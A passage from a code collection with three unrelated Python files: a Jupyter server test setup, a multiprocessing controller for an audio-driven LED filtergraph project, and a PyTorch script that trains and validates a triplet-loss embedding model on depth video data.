# For notebook v6 we could overwrite get_env_patch but unfortunately it is not available for Python 3.5
cls.tmp_dir = TemporaryDirectory()
def tmp(*parts):
path = os.path.join(cls.tmp_dir.name, *parts)
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
return path
cls.home_dir = tmp("home")
data_dir = cls.data_dir = tmp("data")
config_dir = cls.config_dir = tmp("config")
runtime_dir = cls.runtime_dir = tmp("runtime")
cls.notebook_dir = tmp("notebooks")
cls.env_patch = patch.dict(
"os.environ",
{
"HOME": cls.home_dir,
"IPYTHONDIR": os.path.join(cls.home_dir, ".ipython"),
"JUPYTER_NO_CONFIG": "1", # needed in the future
"JUPYTER_CONFIG_DIR": cls.config_dir,
"JUPYTER_DATA_DIR": cls.data_dir,
"JUPYTER_RUNTIME_DIR": cls.runtime_dir,
},
)
cls.env_patch.start()
cls.path_patch = patch.multiple(
jupyter_core.paths,
SYSTEM_JUPYTER_PATH=[tmp("share", "jupyter")],
ENV_JUPYTER_PATH=[tmp("env", "share", "jupyter")],
SYSTEM_CONFIG_PATH=[tmp("etc", "jupyter")],
ENV_CONFIG_PATH=[tmp("env", "etc", "jupyter")],
)
cls.path_patch.start()
config = cls.config or Config()
config.NotebookNotary.db_file = ":memory:"
cls.token = hexlify(os.urandom(4)).decode("ascii")
started = Event()
def start_thread():
if "asyncio" in sys.modules:
import asyncio
asyncio.set_event_loop(asyncio.new_event_loop())
app = cls.notebook = ServerApp(
port=cls.port,
port_retries=0,
open_browser=False,
config_dir=cls.config_dir,
data_dir=cls.data_dir,
runtime_dir=cls.runtime_dir,
notebook_dir=cls.notebook_dir,
base_url=cls.url_prefix,
config=config,
allow_root=True,
token=cls.token,
)
# don't register signal handler during tests
app.init_signal = lambda: None
# clear log handlers and propagate to root for nose to capture it
# needs to be redone after initialize, which reconfigures logging
app.log.propagate = True
app.log.handlers = []
app.initialize()
app.log.propagate = True
app.log.handlers = []
loop = IOLoop.current()
loop.add_callback(started.set)
try:
app.start()
finally:
# set the event, so failure to start doesn't cause a hang
started.set()
app.session_manager.close()
cls.notebook_thread = Thread(target=start_thread)
cls.notebook_thread.daemon = True
cls.notebook_thread.start()
started.wait()
cls.wait_until_alive()
def setUp(self):
super(ServerTest, self).setUp()
self.conda_api = JupyterCondaAPI(self.request)
def wait_task(self, endpoint: str):
start_time = datetime.datetime.now()
if endpoint.startswith("/" + NS):
endpoint = endpoint[len(NS) + 1 :]
while (datetime.datetime.now() - start_time).total_seconds() < TIMEOUT:
time.sleep(SLEEP)
response = self.conda_api.get([endpoint])
response.raise_for_status()
if response.status_code != 202:
return response
raise RuntimeError("Request {} timed out.".format(endpoint))
|
project.py
|
import asyncio
from audioled.filtergraph import (FilterGraph, Updateable)
from typing import List, Dict
import audioled.devices
import audioled.audio
import audioled.filtergraph
import time
import multiprocessing as mp
import traceback
import ctypes
import os
from functools import wraps
import numpy as np
def ensure_parent(func):
@wraps(func)
def inner(self, *args, **kwargs):
if os.getpid() != self._creator_pid:
raise RuntimeError("{} can only be called in the " "parent.".format(func.__name__))
return func(self, *args, **kwargs)
return inner
class PublishQueue(object):
def __init__(self):
self._queues = [] # type: List[mp.JoinableQueue]
self._creator_pid = os.getpid()
def __getstate__(self):
# Work on a copy so pickling does not clear the parent's registered queues.
self_dict = self.__dict__.copy()
self_dict['_queues'] = []
return self_dict
def __setstate__(self, state):
self.__dict__.update(state)
@ensure_parent
def register(self):
q = mp.JoinableQueue()
self._queues.append(q)
return q
@ensure_parent
def unregister(self, q):
self._queues = [queue for queue in self._queues if queue is not q]
@ensure_parent
def publish(self, val):
for q in self._queues:
q.put(val, True, 1)
@ensure_parent
def close(self):
for q in self._queues:
q.close()
@ensure_parent
def join_thread(self):
for q in self._queues:
q.join_thread()
@ensure_parent
def join(self, timeout=None):
# Join without timeout
if timeout is None:
for q in self._queues:
q.join()
return
# Join with timeout
stop = time.time() + timeout
all_done = False
while not all_done and time.time() < stop:
time.sleep(0.001)
all_done = True
for q in self._queues:
if not q._unfinished_tasks._semlock._is_zero():
all_done = False
if all_done:
for q in self._queues:
q.join()
return
raise TimeoutError
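# Illustrative sketch (not used by Project below): the intended PublishQueue pattern of
# registering one JoinableQueue per consumer process and fanning each published value out
# to all of them. The consumer and demo function names are hypothetical.
def _demo_consumer(q):
    # Drain the queue until the None sentinel arrives.
    for item in iter(q.get, None):
        print("consumed", item)
        q.task_done()
    q.task_done()  # account for the sentinel itself

def _publish_queue_demo():
    queue = PublishQueue()
    q = queue.register()
    p = mp.Process(target=_demo_consumer, args=(q,), daemon=True)
    p.start()
    queue.publish("hello")  # every registered queue receives the value
    queue.join()            # block until all consumers have called task_done()
    queue.publish(None)     # ask the consumer to exit
    p.join()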
class UpdateMessage:
def __init__(self, dt, audioBuffer):
self.dt = dt
self.audioBuffer = audioBuffer
class ReplaceFiltergraphMessage:
def __init__(self, deviceId, slotId, filtergraph):
self.filtergraph = filtergraph
self.slotId = slotId
self.deviceId = deviceId
def __str__(self):
return "FiltergraphMessage - deviceId: {}, slotId: {}, filtergraph: {}".format(self.deviceId, self.slotId,
self.filtergraph)
class NodeMessage:
def __init__(self, slotId, nodeUid, operation, params=None):
self.slotId = slotId
self.nodeUid = nodeUid
self.operation = operation
self.params = params
def __str__(self):
return "NodeMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(self.slotId, self.nodeUid, self.operation,
self.params)
class ModulationMessage:
def __init__(self, slotId, modUid, operation, params=None):
self.slotId = slotId
self.modUid = modUid
self.operation = operation
self.params = params
def __str__(self):
return "ModulationMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(
self.slotId, self.modUid, self.operation, self.params)
class ModulationSourceMessage:
def __init__(self, slotId, modSourceUid, operation, params=None):
self.slotId = slotId
self.modSourceUid = modSourceUid
self.operation = operation
self.params = params
def __str__(self):
return "ModulationSourceMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(
self.slotId, self.modSourceUid, self.operation, self.params)
class ConnectionMessage:
def __init__(self, slotId, conUid, operation, params=None):
self.slotId = slotId
self.conUid = conUid
self.operation = operation
self.params = params
def __str__(self):
return "ConnectionMessage - slotId: {}, uid: {}, operation: {}, params: {}".format(
self.slotId, self.conUid, self.operation, self.params)
def worker_process_updateMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
event_loop, message: UpdateMessage):
dt = message.dt
audioBuffer = message.audioBuffer
# print("got item {} in process {}".format(dt, os.getpid()))
# TODO: Hack to propagate audio?
audioled.audio.GlobalAudio.buffer = audioBuffer
# Update Filtergraph
filtergraph.update(dt, event_loop)
filtergraph.process()
# Propagate to outDevice
try:
if filtergraph.getLEDOutput() is None:
return
fgBuffer = filtergraph.getLEDOutput()._outputBuffer
if fgBuffer is None or len(fgBuffer) <= 0:
return
outputDevice.show(fgBuffer[0])
except Exception as e:
print("Error propagating to device: {}".format(e))
def worker_process_nodeMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: NodeMessage):
if message.slotId != slotId:
# Message not meant for this slot
print("Skipping node message for slot {}".format(message.slotId))
return
print("Process node message: {}".format(message))
if message.operation == 'add':
node = filtergraph.addEffectNode(message.params)
node.uid = message.nodeUid
elif message.operation == 'remove':
filtergraph.removeEffectNode(message.nodeUid)
elif message.operation == 'update':
filtergraph.updateNodeParameter(message.nodeUid, message.params)
def worker_process_modulationMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: ModulationMessage):
if message.slotId != slotId:
print("Skipping modulation message for slot {}".format(message.slotId))
return
print("Process modulation message: {}".format(message))
if message.operation == 'add':
mod = message.params # type: audioled.filtergraph.Modulation
newMod = filtergraph.addModulation(modSourceUid=mod.modulationSource.uid,
targetNodeUid=mod.targetNode.uid,
targetParam=mod.targetParameter,
amount=mod.amount,
inverted=mod.inverted)
newMod.uid = mod.uid
elif message.operation == 'remove':
filtergraph.removeModulation(message.modUid)
elif message.operation == 'update':
filtergraph.updateModulationParameter(message.modUid, message.params)
def worker_process_modulationSourceMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: ModulationSourceMessage):
if message.slotId != slotId:
print("Skipping modulation source message for slot {}".format(message.slotId))
return
print("Process modulation source message: {}".format(message))
if message.operation == 'add':
modSource = message.params
newModSource = filtergraph.addModulationSource(modSource)
newModSource.uid = modSource.uid
elif message.operation == 'remove':
filtergraph.removeModulationSource(message.modSourceUid)
elif message.operation == 'update':
filtergraph.updateModulationSourceParameter(message.modSourceUid, message.params)
def worker_process_connectionMessage(filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, slotId: int,
message: ConnectionMessage):
if message.slotId != slotId:
print("Skipping connection message for slot {}".format(message.slotId))
return
print("Process connection message: {}".format(message))
if message.operation == 'add':
con = message.params # type: Dict[str, str]
newCon = filtergraph.addNodeConnection(con['from_node_uid'], con['from_node_channel'], con['to_node_uid'],
con['to_node_channel'])
newCon.uid = con['uid']
elif message.operation == 'remove':
filtergraph.removeConnection(message.conUid)
def worker(q: PublishQueue, filtergraph: FilterGraph, outputDevice: audioled.devices.LEDController, deviceId: int,
slotId: int):
"""Worker process for specific filtergraph for outputDevice
Arguments:
q {PublishQueue} -- [description]
filtergraph {FilterGraph} -- [description]
outputDevice {audioled.devices.LEDController} -- [description]
slotId {int} -- [description]
"""
try:
print("process {} start".format(os.getpid()))
event_loop = asyncio.new_event_loop()
asyncio.set_event_loop(event_loop)
filtergraph.propagateNumPixels(outputDevice.getNumPixels(), outputDevice.getNumRows())
for message in iter(q.get, None):
try:
if isinstance(message, UpdateMessage):
worker_process_updateMessage(filtergraph, outputDevice, slotId, event_loop, message)
elif isinstance(message, NodeMessage):
worker_process_nodeMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ModulationMessage):
worker_process_modulationMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ModulationSourceMessage):
worker_process_modulationSourceMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ConnectionMessage):
worker_process_connectionMessage(filtergraph, outputDevice, slotId, message)
elif isinstance(message, ReplaceFiltergraphMessage):
if message.deviceId == deviceId:
filtergraph = message.filtergraph
slotId = message.slotId
filtergraph.propagateNumPixels(outputDevice.getNumPixels(), outputDevice.getNumRows())
else:
print("Message not supported: {}".format(message))
except audioled.filtergraph.NodeException:
# TODO: Propagate NodeException to project
print("Continuing on NodeException")
finally:
# print("{} done".format(os.getpid()))
# q.task_done()
# TODO: Investigate the task_done() called too many times error further
# Quick fix seems to be:
with q._cond:
if not q._unfinished_tasks.acquire(True):
raise ValueError('task_done() called too many times')
if q._unfinished_tasks._semlock._is_zero():
q._cond.notify_all()
outputDevice.shutdown()
print("process {} exit".format(os.getpid()))
except Exception as e:
traceback.print_exc()
print("process {} exited due to: {}".format(os.getpid(), e))
except:
print("process interrupted")
def output(q, outputDevice: audioled.devices.LEDController, virtualDevice: audioled.devices.VirtualOutput):
try:
print("output process {} start".format(os.getpid()))
for message in iter(q.get, None):
npArray = np.ctypeslib.as_array(virtualDevice._shared_array.get_obj()).reshape(3, -1)
outputDevice.show(npArray.reshape(3, -1, order='C'))
q.task_done()
outputDevice.shutdown()
print("output process {} exit".format(os.getpid()))
except Exception as e:
traceback.print_exc()
print("process {} exited due to: {}".format(os.getpid(), e))
except:
print("process interrupted")
class Project(Updateable):
def __init__(self, name='Empty project', description='', device=None):
self.slots = [None for i in range(127)]
self.activeSceneId = 0
self.activeSlotId = 0
self.name = name
self.description = description
self.id = None
self.outputSlotMatrix = {}
self.__initstate__()
def __initstate__(self):
try:
self.outputSlotMatrix
except AttributeError:
self.outputSlotMatrix = {}
try:
self.activeSceneId
except AttributeError:
self.activeSceneId = self.activeSlotId
self._previewDevice = None # type: audioled.devices.LEDController
self._previewDeviceIndex = 0
self._contentRoot = None
self._devices = []
self._filterGraphForDeviceIndex = {}
self._filtergraphProcesses = {}
self._outputProcesses = {}
self._publishQueue = PublishQueue()
self._showQueue = PublishQueue()
self._lock = mp.Lock()
self._processingEnabled = True
def __cleanState__(self, stateDict):
"""
Cleans given state dictionary from state objects beginning with _
"""
for k in list(stateDict.keys()):
if k.startswith('_'):
stateDict.pop(k)
return stateDict
def __getstate__(self):
"""
Default implementation of __getstate__ that deletes buffer, call __cleanState__ when overloading
"""
state = self.__dict__.copy()
self.__cleanState__(state)
return state
def __setstate__(self, state):
self.__dict__.update(state)
self.__initstate__()
idx = -1
for slot in self.slots:
idx += 1
# Initialize Project Callback
if slot is not None:
slot._contentRoot = self._contentRoot
# Activate loaded scene
if self.activeSceneId is not None:
print("Active scene {}".format(self.activeSceneId))
self.activateScene(self.activeSceneId)
def setDevice(self, device: audioled.devices.MultiOutputWrapper):
print("setting device")
if not isinstance(device, audioled.devices.MultiOutputWrapper):
raise RuntimeError("Device has to be MultiOutputWrapper")
if self._devices == device._devices:
return
self._devices = device._devices
print("Devices updated. Renewing active scene...")
self.stopProcessing()
if self.activeSceneId is not None:
self.activateScene(self.activeSceneId)
def update(self, dt, event_loop=None):
"""Update active FilterGraph
Arguments:
dt {[float]} -- Time since last update
"""
# Resolve the loop lazily; asyncio.get_event_loop() as a default argument
# would be evaluated only once, at method definition time.
event_loop = event_loop or asyncio.get_event_loop()
# print("project: update")
if self._processingEnabled:
acquired = self._lock.acquire(block=True, timeout=0)
if not acquired:
print("Skipping update, couldn't acquire lock")
return
try:
self._sendUpdateCommand(dt)
self._updatePreviewDevice(dt, event_loop)
# Wait for previous show command done
if self._showQueue is not None:
self._showQueue.join(1)
# Wait for all updates
if self._publishQueue is not None:
self._publishQueue.join(1)
# Send show command and return
self._sendShowCommand()
except TimeoutError:
print("Update timeout. Forcing reset")
self.stopProcessing()
if self.activeSceneId is not None:
self.activateScene(self.activeSceneId)
finally:
self._lock.release()
else:
time.sleep(0.01)
print("Waiting...")
def process(self):
"""Process active FilterGraph
"""
self._processPreviewDevice()
def setFiltergraphForSlot(self, slotId, filterGraph):
print("Set {} for slot {}".format(filterGraph, slotId))
if isinstance(filterGraph, FilterGraph):
filterGraph._contentRoot = self._contentRoot
self.slots[slotId] = filterGraph
def activateScene(self, sceneId):
"""Activates a scene
Scene: Project Slot per Output Device
"""
print("activate scene {}".format(sceneId))
# TODO: Make configurable
self._previewDeviceIndex = None
self.activeSceneId = sceneId
self._processingEnabled = False
self._lock.acquire()
try:
# Create new publish queue
if self._publishQueue is None:
self._publishQueue = PublishQueue()
# Create new show queue
if self._showQueue is None:
self._showQueue = PublishQueue()
# Instantiate new scene
dIdx = 0
for device in self._devices:
# Get slot Id associated with this device
try:
slotId = self.outputSlotMatrix[str(dIdx)][str(sceneId)]
except Exception:
# Backwards compatibility: Init with slotId = sceneId
if str(dIdx) not in self.outputSlotMatrix:
self.outputSlotMatrix[str(dIdx)] = {}
if sceneId not in self.outputSlotMatrix[str(dIdx)]:
self.outputSlotMatrix[str(dIdx)][str(sceneId)] = sceneId
slotId = sceneId
# Get filtergraph
filterGraph = self.getSlot(slotId)
if dIdx == self._previewDeviceIndex:
dIdx += 1
continue
self._createOrUpdateProcess(dIdx, device, slotId, filterGraph)
dIdx += 1
finally:
self._processingEnabled = True
print("activate scene - releasing lock")
self._lock.release()
def _createOrUpdateProcess(self, dIdx, device, slotId, filterGraph):
if dIdx in self._filtergraphProcesses:
# Send command
self._sendReplaceFiltergraphCommand(dIdx, slotId, filterGraph)
return
# Create device
outputDevice = None
virtualDevice = None
fgDevice = None
if isinstance(device, audioled.devices.VirtualOutput):
# Reuse virtual output, construct output process if not already present
virtualDevice = device
realDevice = virtualDevice.device
fgDevice = device
if realDevice not in self._outputProcesses:
outputDevice = realDevice
elif isinstance(device, audioled.devices.PanelWrapper):
if isinstance(device.device, audioled.devices.VirtualOutput):
fgDevice = device # PanelWrapper
virtualDevice = fgDevice.device # VirtualDevice
realDevice = virtualDevice.device # Select real device in virtualoutput
if realDevice not in self._outputProcesses:
outputDevice = realDevice
else:
oldPanelWrapper = device
# Construct virtual output, TODO: Make sure device is realDevice...
realDevice = oldPanelWrapper.device
lock = mp.Lock()
array = mp.Array(ctypes.c_uint8, 3 * device.getNumPixels(), lock=lock)
virtualDevice = audioled.devices.VirtualOutput(device=realDevice,
num_pixels=realDevice.getNumPixels(),
shared_array=array,
shared_lock=lock,
num_rows=realDevice.getNumRows(),
start_index=0)
oldPanelWrapper.setDevice(virtualDevice)
fgDevice = oldPanelWrapper
else:
# New virtual output
outputDevice = device
lock = mp.Lock()
array = mp.Array(ctypes.c_uint8, 3 * device.getNumPixels(), lock=lock)
virtualDevice = audioled.devices.VirtualOutput(device=device,
num_pixels=device.getNumPixels(),
shared_array=array,
shared_lock=lock,
num_rows=device.getNumRows(),
start_index=0)
fgDevice = virtualDevice
realDevice = device
# Start filtergraph process
successful = False
while not successful:
q = self._publishQueue.register()
p = mp.Process(target=worker, args=(q, filterGraph, fgDevice, dIdx, slotId))
p.start()
# Process sometimes doesn't start...
q.put(123)
time.sleep(0.1)
if not q._unfinished_tasks._semlock._is_zero():
print("Process didn't respond in time!")
self._publishQueue.unregister(q)
p.join(0.1)
if p.is_alive():
p.terminate()
else:
successful = True
self._filtergraphProcesses[dIdx] = p
print('Started process for device {} with device {}'.format(dIdx, fgDevice))
# Start output process
if outputDevice is not None:
outSuccessful = False
while not outSuccessful:
q = self._showQueue.register()
p = mp.Process(target=output, args=(q, outputDevice, virtualDevice))
p.start()
# Make sure process starts
q.put("test")
time.sleep(0.1)
if not q._unfinished_tasks._semlock._is_zero():
print("Output process didn't respond in time!")
self._showQueue.unregister(q)
p.join(0.1)
if p.is_alive():
p.terminate()
else:
outSuccessful = True
q.put("first")
self._outputProcesses[outputDevice] = p
print("Started output process for device {}".format(outputDevice))
def stopProcessing(self):
print('Stop processing')
self._processingEnabled = False
acquired = self._lock.acquire(block=True, timeout=1)
if not acquired:
print("Couldn't get lock. Force shutdown")
try:
for p in self._filtergraphProcesses.values():
p.join(0.1)
if p.is_alive():
p.terminate()
for p in self._outputProcesses.values():
p.join(0.1)
if p.is_alive():
p.terminate()
self._lock.release()
finally:
self._filtergraphProcesses = {}
self._outputProcesses = {}
self._publishQueue = None
self._showQueue = None
self._processingEnabled = True
return
# Normal shutdown
try:
print("Ending queue")
if self._publishQueue is not None:
self._publishQueue.publish(None)
self._publishQueue.close()
self._publishQueue.join_thread()
print('Publish queue ended')
self._publishQueue = None
if self._showQueue is not None:
self._showQueue.publish(None)
self._showQueue.close()
self._showQueue.join_thread()
print("Show queue ended")
self._showQueue = None
print("Ending processes")
for p in self._filtergraphProcesses.values():
p.join()
print("Filtergraph processes joined")
self._filtergraphProcesses = {}
for p in self._outputProcesses.values():
p.join()
print("Output processes joined")
self._outputProcesses = {}
print('All processes joined')
finally:
print("stop processing - releasing lock")
self._lock.release()
self._processingEnabled = True
def previewSlot(self, slotId):
# Remove eventing from current previewSlot
fg = self.getSlot(self.activeSceneId) # type: FilterGraph
fg._onConnectionAdded = None
fg._onConnectionRemoved = None
fg._onModulationAdded = None
fg._onModulationRemoved = None
fg._onModulationSourceAdded = None
fg._onModulationSourceRemoved = None
fg._onModulationSourceUpdate = None
fg._onModulationUpdate = None
fg._onNodeAdded = None
fg._onNodeRemoved = None
fg._onNodeUpdate = None
self.activeSlotId = slotId
print("Edit slot {} with {}".format(slotId, self.slots[slotId]))
fg = self.getSlot(slotId) # type: FilterGraph
fg._onNodeAdded = self._handleNodeAdded
fg._onNodeRemoved = self._handleNodeRemoved
fg._onNodeUpdate = self._handleNodeUpdate
fg._onModulationAdded = self._handleModulationAdded
fg._onModulationRemoved = self._handleModulationRemoved
fg._onModulationUpdate = self._handleModulationUpdate
fg._onModulationSourceAdded = self._handleModulationSourceAdded
fg._onModulationSourceRemoved = self._handleModulationSourceRemoved
fg._onModulationSourceUpdate = self._handleModulationSourceUpdate
fg._onConnectionAdded = self._handleConnectionAdded
fg._onConnectionRemoved = self._handleConnectionRemoved
def getSlot(self, slotId):
if self.slots[slotId] is None:
print("Initializing slot {}".format(slotId))
self.slots[slotId] = FilterGraph()
fg = self.slots[slotId]
fg._contentRoot = self._contentRoot
return fg
def getSceneMatrix(self):
numDevices = len(self._devices)
retMatrix = {}
for i in range(0, numDevices):
if i in self.outputSlotMatrix:
retMatrix[i] = self.outputSlotMatrix[i]
if '%s' % i in self.outputSlotMatrix:
retMatrix[i] = self.outputSlotMatrix['%s' % i]
return retMatrix
def setSceneMatrix(self, value):
# TODO: Validate
for key, val in value.items():
self.outputSlotMatrix[key] = val
self.activateScene(self.activeSceneId)
def _handleNodeAdded(self, node: audioled.filtergraph.Node):
self._lock.acquire()
try:
self._publishQueue.publish(NodeMessage(self.activeSlotId, node.uid, 'add', node.effect))
finally:
self._lock.release()
def _handleNodeRemoved(self, node: audioled.filtergraph.Node):
self._lock.acquire()
try:
self._publishQueue.publish(NodeMessage(self.activeSlotId, node.uid, 'remove'))
finally:
self._lock.release()
def _handleNodeUpdate(self, node: audioled.filtergraph.Node, updateParameters):
self._lock.acquire()
try:
self._publishQueue.publish(NodeMessage(self.activeSlotId, node.uid, 'update', updateParameters))
finally:
self._lock.release()
def _handleModulationAdded(self, mod: audioled.filtergraph.Modulation):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationMessage(self.activeSlotId, mod.uid, 'add', mod))
finally:
self._lock.release()
def _handleModulationRemoved(self, mod: audioled.filtergraph.Modulation):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationMessage(self.activeSlotId, mod.uid, 'remove'))
finally:
self._lock.release()
def _handleModulationUpdate(self, mod: audioled.filtergraph.Modulation, updateParameters):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationMessage(self.activeSlotId, mod.uid, 'update', updateParameters))
finally:
self._lock.release()
def _handleModulationSourceAdded(self, modSource: audioled.filtergraph.ModulationSourceNode):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationSourceMessage(self.activeSlotId, modSource.uid, 'add', modSource))
finally:
self._lock.release()
def _handleModulationSourceRemoved(self, modSource: audioled.filtergraph.ModulationSourceNode):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationSourceMessage(self.activeSlotId, modSource.uid, 'remove'))
finally:
self._lock.release()
def _handleModulationSourceUpdate(self, modSource: audioled.filtergraph.ModulationSourceNode, updateParameters):
self._lock.acquire()
try:
self._publishQueue.publish(ModulationSourceMessage(self.activeSlotId, modSource.uid, 'update', updateParameters))
finally:
self._lock.release()
def _handleConnectionAdded(self, con: audioled.filtergraph.Connection):
self._lock.acquire()
try:
self._publishQueue.publish(ConnectionMessage(self.activeSlotId, con.uid, 'add', con.__getstate__()))
finally:
self._lock.release()
def _handleConnectionRemoved(self, con: audioled.filtergraph.Connection):
self._lock.acquire()
try:
self._publishQueue.publish(ConnectionMessage(self.activeSlotId, con.uid, 'remove'))
finally:
self._lock.release()
def _sendUpdateCommand(self, dt):
if self._publishQueue is None:
print("No publish queue. Possibly exiting")
return
self._publishQueue.publish(UpdateMessage(dt, audioled.audio.GlobalAudio.buffer))
def _sendShowCommand(self):
if self._showQueue is None:
print("No show queue. Possibly exiting")
return
self._showQueue.publish("show!")
def _sendReplaceFiltergraphCommand(self, dIdx, slotId, filtergraph):
self._publishQueue.publish(ReplaceFiltergraphMessage(dIdx, slotId, filtergraph))
def _updatePreviewDevice(self, dt, event_loop=None):
# Process preview in this process; resolve the event loop lazily instead of
# using a default evaluated at definition time.
event_loop = event_loop or asyncio.get_event_loop()
if self._previewDeviceIndex is not None:
activeFilterGraph = self.getSlot(self.activeSceneId)
if activeFilterGraph is None:
return
previewDevice = self._devices[self._previewDeviceIndex]
if previewDevice is not None and activeFilterGraph.getLEDOutput() is not None:
if (previewDevice.getNumPixels() != activeFilterGraph.getLEDOutput().effect.getNumOutputPixels()
or previewDevice.getNumRows() != activeFilterGraph.getLEDOutput().effect.getNumOutputRows()):
print("propagating {} pixels on {} rows".format(previewDevice.getNumPixels(), previewDevice.getNumRows()))
activeFilterGraph.propagateNumPixels(previewDevice.getNumPixels(), previewDevice.getNumRows())
activeFilterGraph.update(dt, event_loop)
def _processPreviewDevice(self):
"""Process active FilterGraph
"""
# Process preview in this process
if self._previewDeviceIndex is not None:
activeFilterGraph = self.getSlot(self.activeSceneId)
if activeFilterGraph is None:
return
previewDevice = self._devices[self._previewDeviceIndex]
if previewDevice is not None and activeFilterGraph.getLEDOutput() is not None:
activeFilterGraph.process()
if activeFilterGraph.getLEDOutput()._outputBuffer[0] is not None:
previewDevice.show(activeFilterGraph.getLEDOutput()._outputBuffer[0])
|
train_ltcn_depth.py
|
import os
import argparse
import torch
import numpy as np
import pickle
import sys
sys.path.append('./utils')
from torch import optim
from torch import nn
from torch import multiprocessing
from torch.optim import lr_scheduler
from torch.autograd import Variable
from torch.utils.data import DataLoader, ConcatDataset
from utils.util import distance, Logger, ensure_folder, collate_fn
from utils.builders import SingleViewDepthTripletRCNNBuilder
from utils.vocabulary import Vocabulary
from tcn import define_model_ltcn_depth, define_model_ltcn
from ipdb import set_trace
from sklearn.preprocessing import OneHotEncoder
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
from torchvision import transforms
from utils.plot_utils import plot_mean
IMAGE_SIZE = (299, 299)
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"]= "1,2"
ITERATE_OVER_TRIPLETS = 3
EXP_DIR = '/media/msieb/data/tcn_data/experiments/cube_rotating/'
EXP_NAME = 'cube_rotating'
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--start-epoch', type=int, default=0)
parser.add_argument('--epochs', type=int, default=1000)
parser.add_argument('--save-every', type=int, default=5)
parser.add_argument('--model-folder', type=str, default=EXP_DIR + 'trained_models/ltcn-roi-sv')
parser.add_argument('--load-model', type=str, required=False)
# parser.add_argument('--train-directory', type=str, default='./data/multiview-pouring/train/')
# parser.add_argument('--validation-directory', type=str, default='./data/multiview-pouring/val/')
parser.add_argument('--train-directory', type=str, default=EXP_DIR + 'videos/train/')
parser.add_argument('--train-directory-depth', type=str, default=EXP_DIR + 'depth/train/')
parser.add_argument('--validation-directory', type=str, default=EXP_DIR + 'videos/valid/')
parser.add_argument('--validation-directory-depth', type=str, default=EXP_DIR + 'depth/valid/')
parser.add_argument('--minibatch-size', type=int, default=16)
parser.add_argument('--margin', type=float, default=2.0)
parser.add_argument('--model-name', type=str, default='ltcn')
parser.add_argument('--log-file', type=str, default='./out.log')
parser.add_argument('--lr-start', type=float, default=0.001)
parser.add_argument('--triplets-from-videos', type=int, default=5)
parser.add_argument('--n-views', type=int, default=3)
parser.add_argument('--alpha', type=float, default=0.001, help='weighing factor of language loss to triplet loss')
# parser.add_argument('--model_path', type=str, default='models/' , help='path for saving trained models')
# parser.add_argument('--crop_size', type=int, default=224 , help='size for randomly cropping images')
# parser.add_argument('--vocab_path', type=str, default='data/vocab.pkl', help='path for vocabulary wrapper')
# parser.add_argument('--image_dir', type=str, default='data/resized2014', help='directory for resized images')
# parser.add_argument('--caption_path', type=str, default='data/annotations/captions_train2014.json', help='path for train annotation json file')
# parser.add_argument('--log_step', type=int , default=10, help='step size for prining log info')
# parser.add_argument('--save_step', type=int , default=1000, help='step size for saving trained models')
# Model parameters
parser.add_argument('--embed_size', type=int , default=32, help='dimension of word embedding vectors')
parser.add_argument('--hidden_size', type=int , default=256, help='dimension of lstm hidden states')
parser.add_argument('--num_layers', type=int , default=1, help='number of layers in lstm')
# parser.add_argument('--num_epochs', type=int, default=5)
# parser.add_argument('--batch_size', type=int, default=128)
# parser.add_argument('--num_workers', type=int, default=2)
# parser.add_argument('--learning_rate', type=float, default=0.001)
return parser.parse_args()
args = get_args()
print(args)
builder = SingleViewDepthTripletRCNNBuilder
logger = Logger(args.log_file)
def batch_size(epoch, max_size):
exponent = epoch // 100
return min(max(2 ** (exponent), 2), max_size)
validation_builder = builder(args.n_views, args.validation_directory, args.validation_directory_depth, IMAGE_SIZE, args, sample_size=50)
validation_set = [validation_builder.build_set() for i in range(3)]
validation_set = ConcatDataset(validation_set)
del validation_builder
def validate(tcn, use_cuda, args):
# Run model on validation data and log results
data_loader = DataLoader(
validation_set,
batch_size=32,
shuffle=False,
pin_memory=use_cuda,
)
correct_with_margin = 0
correct_without_margin = 0
losses = []
for frames, features in data_loader:
# frames = Variable(minibatch, require_grad=False)
if use_cuda:
frames = frames.cuda()
features = features.cuda()
anchor_frames = frames[:, 0, :, :, :]
positive_frames = frames[:, 1, :, :, :]
negative_frames = frames[:, 2, :, :, :]
anchor_features = features[:, 0, :, :, :]
positive_features = features[:, 1, :, :, :]
negative_features = features[:, 2, :, :, :]
anchor_output, unnormalized, _ = tcn(anchor_frames, anchor_features)
positive_output, _, _ = tcn(positive_frames, positive_features)
negative_output, _, _ = tcn(negative_frames, negative_features)
d_positive = distance(anchor_output, positive_output)
d_negative = distance(anchor_output, negative_output)
assert(d_positive.size()[0] == frames.size()[0])
correct_with_margin += ((d_positive + args.margin) < d_negative).data.cpu().numpy().sum()
correct_without_margin += (d_positive < d_negative).data.cpu().numpy().sum()
loss_triplet = torch.clamp(args.margin + d_positive - d_negative, min=0.0).mean()
loss = loss_triplet
losses.append(loss.data.cpu().numpy())
loss = np.mean(losses)
logger.info('val loss: {}'.format(loss))
message = "Validation score correct with margin {with_margin}/{total} and without margin {without_margin}/{total}".format(
with_margin=correct_with_margin,
without_margin=correct_without_margin,
total=len(validation_set)
)
logger.info(message)
return correct_with_margin, correct_without_margin, loss
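# Illustrative sketch (not called by the training loop): the hinge-style triplet
# objective used above and in main(), isolated as a standalone helper. The helper name
# is hypothetical; distance() is the same utility imported at the top of this file.
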